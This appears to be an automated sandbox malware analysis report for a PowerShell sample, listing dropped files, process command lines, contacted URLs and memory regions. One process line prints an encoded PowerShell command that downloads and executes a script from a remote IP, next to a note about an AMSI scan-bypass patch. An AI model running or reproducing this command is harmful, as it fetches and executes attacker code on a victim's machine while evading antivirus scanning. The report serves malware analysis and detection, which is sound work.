Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
read.md.ps1
|
ASCII text, with very long lines (386)
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\342xs1bj\342xs1bj.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\342xs1bj\342xs1bj.0.cs
|
Unicode text, UTF-8 (with BOM) text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\342xs1bj\342xs1bj.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\342xs1bj\342xs1bj.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (460), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\342xs1bj\CSCE2520CC5ECF449C4902DF16D49DC74DD.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RESC0D1.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Fri Nov 1 09:05:35 2024,
1st section name ".debug$S"
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40y15puv.43k.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4ozuldc.jzv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4yy1mn5.b14.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nofcnku1.sz2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxzut45k.fr0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfcckfdp.4s5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S5TKV86GLOWO0TV3ZMPZ.temp
|
data
|
dropped
|
There are 7 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\read.md.ps1"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\342xs1bj\342xs1bj.cmdline"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABzAHkAcwB0AGUAbQAuAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA4ADcALgAxADIAMAAuADEAMQAzAC4AMQAyADUALwByAGUAYQBkAG0AZQAuAG0AZAAnACkA=#Rasta-mouses
Amsi-Scan-Buffer patch \n
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABzAHkAcwB0AGUAbQAuAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA4ADcALgAxADIAMAAuADEAMQAzAC4AMQAyADUALwByAGUAYQBkAG0AZQAuAG0AZAAnACkA=
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC0D1.tmp"
"c:\Users\user\AppData\Local\Temp\342xs1bj\CSCE2520CC5ECF449C4902DF16D49DC74DD.TMP"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://87.120.113.125/readme.md
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 5 hidden URLs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
16284268000
|
heap
|
page read and write
|
||
|
B6540FB000
|
stack
|
page read and write
|
||
|
162845D0000
|
heap
|
page read and write
|
||
|
1628427D000
|
heap
|
page read and write
|
||
|
B653595000
|
stack
|
page read and write
|
||
|
20647D5000
|
stack
|
page read and write
|
||
|
16287130000
|
direct allocation
|
page read and write
|
||
|
EFFC73F000
|
stack
|
page read and write
|
||
|
1FBC9CA1000
|
heap
|
page read and write
|
||
|
B653DF8000
|
stack
|
page read and write
|
||
|
1FBC9B20000
|
heap
|
page read and write
|
||
|
EFFBFEE000
|
stack
|
page read and write
|
||
|
1FBC9CBD000
|
heap
|
page read and write
|
||
|
B653A7E000
|
stack
|
page read and write
|
||
|
23BC10FF000
|
heap
|
page read and write
|
||
|
7FFAAC383000
|
trusted library allocation
|
page execute and read and write
|
||
|
B653F7E000
|
stack
|
page read and write
|
||
|
23BB9100000
|
trusted library allocation
|
page read and write
|
||
|
12918461000
|
heap
|
page read and write
|
||
|
1FBCBB4A000
|
trusted library allocation
|
page read and write
|
||
|
162871B0000
|
direct allocation
|
page read and write
|
||
|
1FBC9C60000
|
heap
|
page read and write
|
||
|
1FBCBB6E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
1FBC9C68000
|
heap
|
page read and write
|
||
|
12932A2D000
|
heap
|
page read and write
|
||
|
23BA726C000
|
heap
|
page read and write
|
||
|
23BC13E0000
|
heap
|
page read and write
|
||
|
23BC1400000
|
heap
|
page read and write
|
||
|
1FBC9CE5000
|
heap
|
page read and write
|
||
|
23BC1527000
|
heap
|
page read and write
|
||
|
2064EB9000
|
stack
|
page read and write
|
||
|
16284550000
|
heap
|
page read and write
|
||
|
129182A0000
|
heap
|
page read and write
|
||
|
2064BFD000
|
stack
|
page read and write
|
||
|
7FFAAC55A000
|
trusted library allocation
|
page read and write
|
||
|
162842D5000
|
heap
|
page read and write
|
||
|
EFFC53E000
|
stack
|
page read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
162842FE000
|
heap
|
page read and write
|
||
|
1FBC9EB4000
|
heap
|
page read and write
|
||
|
7FFAAC560000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FBC9CAB000
|
heap
|
page read and write
|
||
|
23BC13D7000
|
heap
|
page execute and read and write
|
||
|
1FBE3C6A000
|
heap
|
page read and write
|
||
|
23BC1235000
|
heap
|
page read and write
|
||
|
23BA7170000
|
heap
|
page read and write
|
||
|
23BC1535000
|
heap
|
page read and write
|
||
|
7FFAAC45C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC520000
|
trusted library allocation
|
page read and write
|
||
|
1ED6E239000
|
heap
|
page read and write
|
||
|
16284295000
|
heap
|
page read and write
|
||
|
23BA725C000
|
heap
|
page read and write
|
||
|
1ED6E0C0000
|
heap
|
page read and write
|
||
|
23BA8D40000
|
heap
|
page read and write
|
||
|
23BA7460000
|
trusted library allocation
|
page read and write
|
||
|
1FBCBB2D000
|
trusted library allocation
|
page read and write
|
||
|
16284507000
|
direct allocation
|
page read and write
|
||
|
B653C7C000
|
stack
|
page read and write
|
||
|
7FFB167B2000
|
unkown
|
page readonly
|
||
|
1FBCB710000
|
heap
|
page execute and read and write
|
||
|
7FFAAC5C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC38D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC542000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC600000
|
trusted library allocation
|
page read and write
|
||
|
162871B5000
|
direct allocation
|
page read and write
|
||
|
1ED6E1A0000
|
heap
|
page read and write
|
||
|
162842AF000
|
heap
|
page read and write
|
||
|
7FFAAC384000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC420000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
|
1FBC9CE7000
|
heap
|
page read and write
|
||
|
1FBE3E20000
|
heap
|
page read and write
|
||
|
12919CD0000
|
trusted library allocation
|
page read and write
|
||
|
162842F5000
|
heap
|
page read and write
|
||
|
23BA94B1000
|
trusted library allocation
|
page read and write
|
||
|
1FBCBB5B000
|
trusted library allocation
|
page read and write
|
||
|
1628451D000
|
direct allocation
|
page read and write
|
||
|
23BC153A000
|
heap
|
page read and write
|
||
|
7FFAAC515000
|
trusted library allocation
|
page read and write
|
||
|
20650BF000
|
stack
|
page read and write
|
||
|
16284279000
|
heap
|
page read and write
|
||
|
16284250000
|
heap
|
page read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
1FBC9DD0000
|
heap
|
page readonly
|
||
|
1FBE3C20000
|
heap
|
page read and write
|
||
|
1292A403000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
12932A43000
|
heap
|
page read and write
|
||
|
129183F0000
|
heap
|
page read and write
|
||
|
2064C7E000
|
stack
|
page read and write
|
||
|
1291850E000
|
heap
|
page read and write
|
||
|
23BA7420000
|
heap
|
page read and write
|
||
|
1FBDBB21000
|
trusted library allocation
|
page read and write
|
||
|
23BC1549000
|
heap
|
page read and write
|
||
|
7FFAAC450000
|
trusted library allocation
|
page read and write
|
||
|
2064E3E000
|
stack
|
page read and write
|
||
|
1291A3D6000
|
trusted library allocation
|
page read and write
|
||
|
2064CFE000
|
stack
|
page read and write
|
||
|
12918435000
|
heap
|
page read and write
|
||
|
5FC3DFE000
|
stack
|
page read and write
|
||
|
23BA71B0000
|
heap
|
page read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
|
2064FBA000
|
stack
|
page read and write
|
||
|
1291A414000
|
trusted library allocation
|
page read and write
|
||
|
1FBCBB11000
|
trusted library allocation
|
page read and write
|
||
|
1FBC9D60000
|
heap
|
page read and write
|
||
|
129329C0000
|
heap
|
page read and write
|
||
|
7FFAAC522000
|
trusted library allocation
|
page read and write
|
||
|
B653E7A000
|
stack
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
B653B7E000
|
stack
|
page read and write
|
||
|
1291A190000
|
heap
|
page execute and read and write
|
||
|
162842B6000
|
heap
|
page read and write
|
||
|
129183D4000
|
heap
|
page read and write
|
||
|
7FFAAC582000
|
trusted library allocation
|
page read and write
|
||
|
2064D7E000
|
stack
|
page read and write
|
||
|
23BA917B000
|
trusted library allocation
|
page read and write
|
||
|
1FBC9C00000
|
heap
|
page read and write
|
||
|
23BA72B5000
|
heap
|
page read and write
|
||
|
12918454000
|
heap
|
page read and write
|
||
|
311FBFF000
|
stack
|
page read and write
|
||
|
162871B3000
|
direct allocation
|
page read and write
|
||
|
23BA9EB1000
|
trusted library allocation
|
page read and write
|
||
|
1FBDBB17000
|
trusted library allocation
|
page read and write
|
||
|
1FBCB7C0000
|
heap
|
page read and write
|
||
|
EFFC47E000
|
stack
|
page read and write
|
||
|
16284540000
|
heap
|
page read and write
|
||
|
5FC3CFC000
|
stack
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
|
23BA71F4000
|
heap
|
page read and write
|
||
|
23BB90F1000
|
trusted library allocation
|
page read and write
|
||
|
B6535DE000
|
stack
|
page read and write
|
||
|
7FFAAC535000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
129329E7000
|
heap
|
page read and write
|
||
|
1FBC9D80000
|
trusted library section
|
page read and write
|
||
|
23BA7475000
|
heap
|
page read and write
|
||
|
1FBC9CA7000
|
heap
|
page read and write
|
||
|
23BC153D000
|
heap
|
page read and write
|
||
|
2064B7E000
|
stack
|
page read and write
|
||
|
23BAAD97000
|
trusted library allocation
|
page read and write
|
||
|
23BC1523000
|
heap
|
page read and write
|
||
|
23BC13B0000
|
trusted library section
|
page read and write
|
||
|
7FFAAC456000
|
trusted library allocation
|
page read and write
|
||
|
2064A7D000
|
stack
|
page read and write
|
||
|
B65407E000
|
stack
|
page read and write
|
||
|
129183D0000
|
heap
|
page read and write
|
||
|
1292A399000
|
trusted library allocation
|
page read and write
|
||
|
1FBC9DA0000
|
trusted library allocation
|
page read and write
|
||
|
B653D77000
|
stack
|
page read and write
|
||
|
12919D00000
|
heap
|
page readonly
|
||
|
EFFC6BE000
|
stack
|
page read and write
|
||
|
162842BE000
|
heap
|
page read and write
|
||
|
1291A420000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC382000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3BB000
|
trusted library allocation
|
page read and write
|
||
|
1291846B000
|
heap
|
page read and write
|
||
|
162842D6000
|
heap
|
page read and write
|
||
|
162842E7000
|
heap
|
page read and write
|
||
|
B65397E000
|
stack
|
page read and write
|
||
|
162845D4000
|
heap
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
1291A391000
|
trusted library allocation
|
page read and write
|
||
|
23BAAABA000
|
trusted library allocation
|
page read and write
|
||
|
7FFB167B5000
|
unkown
|
page readonly
|
||
|
7FFAAC5A0000
|
trusted library allocation
|
page read and write
|
||
|
23BA8C73000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC430000
|
trusted library allocation
|
page read and write
|
||
|
16284273000
|
heap
|
page read and write
|
||
|
1ED6E1C4000
|
heap
|
page read and write
|
||
|
162842E1000
|
heap
|
page read and write
|
||
|
B654ACE000
|
stack
|
page read and write
|
||
|
12919CF0000
|
trusted library allocation
|
page read and write
|
||
|
16284570000
|
direct allocation
|
page read and write
|
||
|
16287170000
|
direct allocation
|
page read and write
|
||
|
12919D80000
|
trusted library allocation
|
page read and write
|
||
|
B653AFB000
|
stack
|
page read and write
|
||
|
7FFAAC460000
|
trusted library allocation
|
page execute and read and write
|
||
|
1291A3B1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
162842B7000
|
heap
|
page read and write
|
||
|
7FFAAC570000
|
trusted library allocation
|
page execute and read and write
|
||
|
16284450000
|
heap
|
page read and write
|
||
|
23BC12F4000
|
heap
|
page read and write
|
||
|
23BC1275000
|
heap
|
page read and write
|
||
|
5FC3EFF000
|
stack
|
page read and write
|
||
|
7FFAAC480000
|
trusted library allocation
|
page execute and read and write
|
||
|
129323B0000
|
heap
|
page read and write
|
||
|
B6538FE000
|
stack
|
page read and write
|
||
|
1FBC9CEA000
|
heap
|
page read and write
|
||
|
EFFC4F8000
|
stack
|
page read and write
|
||
|
23BA8D70000
|
heap
|
page execute and read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
23BAAE5C000
|
trusted library allocation
|
page read and write
|
||
|
1FBCB7C4000
|
heap
|
page read and write
|
||
|
16284257000
|
heap
|
page read and write
|
||
|
1FBC9C93000
|
heap
|
page read and write
|
||
|
1FBC9DF0000
|
heap
|
page read and write
|
||
|
23BC1538000
|
heap
|
page read and write
|
||
|
1ED6E1D0000
|
heap
|
page read and write
|
||
|
2064DF8000
|
stack
|
page read and write
|
||
|
1FBC9C20000
|
heap
|
page read and write
|
||
|
EFFC2FD000
|
stack
|
page read and write
|
||
|
23BA7289000
|
heap
|
page read and write
|
||
|
7FFAAC41C000
|
trusted library allocation
|
page execute and read and write
|
||
|
23BC1210000
|
heap
|
page read and write
|
||
|
16284430000
|
heap
|
page read and write
|
||
|
1292A397000
|
trusted library allocation
|
page read and write
|
||
|
23BA90F1000
|
trusted library allocation
|
page read and write
|
||
|
1FBC9EB0000
|
heap
|
page read and write
|
||
|
7FFAAC373000
|
trusted library allocation
|
page read and write
|
||
|
162842FE000
|
heap
|
page read and write
|
||
|
162842A1000
|
heap
|
page read and write
|
||
|
23BA8CB0000
|
trusted library allocation
|
page read and write
|
||
|
23BA72BD000
|
heap
|
page read and write
|
||
|
1FBCBB9A000
|
trusted library allocation
|
page read and write
|
||
|
162842A6000
|
heap
|
page read and write
|
||
|
23BC123A000
|
heap
|
page read and write
|
||
|
7DF432740000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FBC9C8B000
|
heap
|
page read and write
|
||
|
1FBC9C9C000
|
heap
|
page read and write
|
||
|
162842C5000
|
heap
|
page read and write
|
||
|
1ED6E230000
|
heap
|
page read and write
|
||
|
EFFC7BE000
|
stack
|
page read and write
|
||
|
129184AE000
|
heap
|
page read and write
|
||
|
1291A42E000
|
trusted library allocation
|
page read and write
|
||
|
23BA7430000
|
trusted library allocation
|
page read and write
|
||
|
1FBC9C8E000
|
heap
|
page read and write
|
||
|
23BA8C30000
|
heap
|
page execute and read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
|
23BAA8B1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC540000
|
trusted library allocation
|
page read and write
|
||
|
23BA71E8000
|
heap
|
page read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
1291A3ED000
|
trusted library allocation
|
page read and write
|
||
|
23BA9322000
|
trusted library allocation
|
page read and write
|
||
|
23BC12AB000
|
heap
|
page read and write
|
||
|
16284298000
|
heap
|
page read and write
|
||
|
23BA7271000
|
heap
|
page read and write
|
||
|
162871C1000
|
direct allocation
|
page read and write
|
||
|
23BA7150000
|
heap
|
page read and write
|
||
|
B653D7E000
|
stack
|
page read and write
|
||
|
2064F3E000
|
stack
|
page read and write
|
||
|
23BAAB15000
|
trusted library allocation
|
page read and write
|
||
|
23BAAA8E000
|
trusted library allocation
|
page read and write
|
||
|
1FBDBB11000
|
trusted library allocation
|
page read and write
|
||
|
12918456000
|
heap
|
page read and write
|
||
|
1FBCBB9E000
|
trusted library allocation
|
page read and write
|
||
|
311F7F8000
|
stack
|
page read and write
|
||
|
16284350000
|
heap
|
page read and write
|
||
|
7FFAAC4A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23BA8C20000
|
heap
|
page readonly
|
||
|
7FFAAC6B0000
|
trusted library allocation
|
page read and write
|
||
|
162842E1000
|
heap
|
page read and write
|
||
|
23BC1273000
|
heap
|
page read and write
|
||
|
7FFAAC440000
|
trusted library allocation
|
page execute and read and write
|
||
|
23BC1546000
|
heap
|
page read and write
|
||
|
23BA7470000
|
heap
|
page read and write
|
||
|
7FFAAC446000
|
trusted library allocation
|
page execute and read and write
|
||
|
B65387E000
|
stack
|
page read and write
|
||
|
7FFAAC3AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC3B0000
|
trusted library allocation
|
page read and write
|
||
|
23BA7425000
|
heap
|
page read and write
|
||
|
23BA742A000
|
heap
|
page read and write
|
||
|
16287150000
|
direct allocation
|
page read and write
|
||
|
12932A0D000
|
heap
|
page read and write
|
||
|
B6539FD000
|
stack
|
page read and write
|
||
|
16287190000
|
direct allocation
|
page read and write
|
||
|
7FFAAC364000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5B0000
|
trusted library allocation
|
page read and write
|
||
|
1FBC9DE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
|
162842FE000
|
heap
|
page read and write
|
||
|
162871B3000
|
direct allocation
|
page read and write
|
||
|
7FFAAC3A2000
|
trusted library allocation
|
page read and write
|
||
|
1291A3B5000
|
trusted library allocation
|
page read and write
|
||
|
1FBE3C6C000
|
heap
|
page read and write
|
||
|
23BA7140000
|
heap
|
page read and write
|
||
|
16287110000
|
direct allocation
|
page read and write
|
||
|
16284503000
|
direct allocation
|
page read and write
|
||
|
12932A36000
|
heap
|
page read and write
|
||
|
23BC1260000
|
heap
|
page read and write
|
||
|
12932A3C000
|
heap
|
page read and write
|
||
|
7FFAAC36D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC486000
|
trusted library allocation
|
page execute and read and write
|
||
|
23BC14E6000
|
heap
|
page read and write
|
||
|
7FFB16790000
|
unkown
|
page readonly
|
||
|
7FFAAC370000
|
trusted library allocation
|
page read and write
|
||
|
12918420000
|
heap
|
page read and write
|
||
|
1FBE3C96000
|
heap
|
page read and write
|
||
|
7FFAAC584000
|
trusted library allocation
|
page read and write
|
||
|
206503E000
|
stack
|
page read and write
|
||
|
1FBE3DF0000
|
heap
|
page execute and read and write
|
||
|
23BA728B000
|
heap
|
page read and write
|
||
|
7FFAAC466000
|
trusted library allocation
|
page execute and read and write
|
||
|
23BB9163000
|
trusted library allocation
|
page read and write
|
||
|
12919DA0000
|
heap
|
page read and write
|
||
|
129184A9000
|
heap
|
page read and write
|
||
|
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
|
EFFC5B9000
|
stack
|
page read and write
|
||
|
7FFAAC410000
|
trusted library allocation
|
page read and write
|
||
|
1FBCBB4F000
|
trusted library allocation
|
page read and write
|
||
|
23BA8C70000
|
trusted library allocation
|
page read and write
|
||
|
1FBC9DC0000
|
trusted library allocation
|
page read and write
|
||
|
23BC14E0000
|
heap
|
page read and write
|
||
|
12918410000
|
trusted library section
|
page read and write
|
||
|
1FBE3C99000
|
heap
|
page read and write
|
||
|
7FFAAC3A4000
|
trusted library allocation
|
page read and write
|
||
|
129183A0000
|
heap
|
page read and write
|
||
|
162871C1000
|
direct allocation
|
page read and write
|
||
|
B653EFE000
|
stack
|
page read and write
|
||
|
7FFAAC363000
|
trusted library allocation
|
page execute and read and write
|
||
|
EFFBEE5000
|
stack
|
page read and write
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page read and write
|
||
|
1292A391000
|
trusted library allocation
|
page read and write
|
||
|
1291A1D0000
|
heap
|
page read and write
|
||
|
7FFAAC390000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
EFFC3FE000
|
stack
|
page read and write
|
||
|
2064AFF000
|
stack
|
page read and write
|
||
|
1FBE3C90000
|
heap
|
page read and write
|
||
|
7FFAAC6D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB16791000
|
unkown
|
page execute read
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
12918427000
|
heap
|
page read and write
|
||
|
23BC12CD000
|
heap
|
page read and write
|
||
|
EFFC63E000
|
stack
|
page read and write
|
||
|
EFFC37F000
|
stack
|
page read and write
|
||
|
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC500000
|
trusted library allocation
|
page read and write
|
||
|
1FBE3C38000
|
heap
|
page read and write
|
||
|
16284294000
|
heap
|
page read and write
|
||
|
7FFAAC393000
|
trusted library allocation
|
page read and write
|
||
|
12918380000
|
heap
|
page read and write
|
||
|
1291A380000
|
heap
|
page execute and read and write
|
||
|
7FFAAC362000
|
trusted library allocation
|
page read and write
|
||
|
23BA71E0000
|
heap
|
page read and write
|
||
|
16284290000
|
heap
|
page read and write
|
||
|
B653BFE000
|
stack
|
page read and write
|
||
|
311F9FF000
|
stack
|
page read and write
|
||
|
1628428E000
|
heap
|
page read and write
|
||
|
23BA8DA0000
|
heap
|
page read and write
|
||
|
162842E6000
|
heap
|
page read and write
|
||
|
12918463000
|
heap
|
page read and write
|
||
|
23BC13D0000
|
heap
|
page execute and read and write
|
||
|
16284590000
|
direct allocation
|
page read and write
|
||
|
7FFAAC416000
|
trusted library allocation
|
page read and write
|
||
|
7FFB167A6000
|
unkown
|
page readonly
|
||
|
7FFAAC43C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC590000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC551000
|
trusted library allocation
|
page read and write
|
||
|
B653CF9000
|
stack
|
page read and write
|
||
|
16284500000
|
direct allocation
|
page read and write
|
||
|
12932A0B000
|
heap
|
page read and write
|
||
|
1ED6E1C0000
|
heap
|
page read and write
|
||
|
162842AF000
|
heap
|
page read and write
|
||
|
162844C0000
|
direct allocation
|
page read and write
|
||
|
12932A38000
|
heap
|
page read and write
|
||
|
EFFC27E000
|
stack
|
page read and write
|
||
|
7FFAAC436000
|
trusted library allocation
|
page read and write
|
||
|
162871B5000
|
direct allocation
|
page read and write
|
||
|
7FFAAC5D0000
|
trusted library allocation
|
page read and write
|
||
|
1FBE3C3E000
|
heap
|
page read and write
|
||
|
23BC122E000
|
heap
|
page read and write
|
||
|
1FBDBB19000
|
trusted library allocation
|
page read and write
|
||
|
12918481000
|
heap
|
page read and write
|
||
|
1FBDBB83000
|
trusted library allocation
|
page read and write
|
||
|
23BB92A6000
|
trusted library allocation
|
page read and write
|
||
|
162842EF000
|
heap
|
page read and write
|
||
|
12919DA4000
|
heap
|
page read and write
|
||
|
16284544000
|
heap
|
page read and write
|
||
|
23BAAE60000
|
trusted library allocation
|
page read and write
|
||
|
1292A3A1000
|
trusted library allocation
|
page read and write
|
||
|
1628451B000
|
direct allocation
|
page read and write
|
||
|
16284520000
|
direct allocation
|
page read and write
|
||
|
162842FB000
|
heap
|
page read and write
|
||
|
EFFBF6E000
|
stack
|
page read and write
|
||
|
7FFAAC620000
|
trusted library allocation
|
page read and write
|
There are 371 hidden memdumps, click here to show them.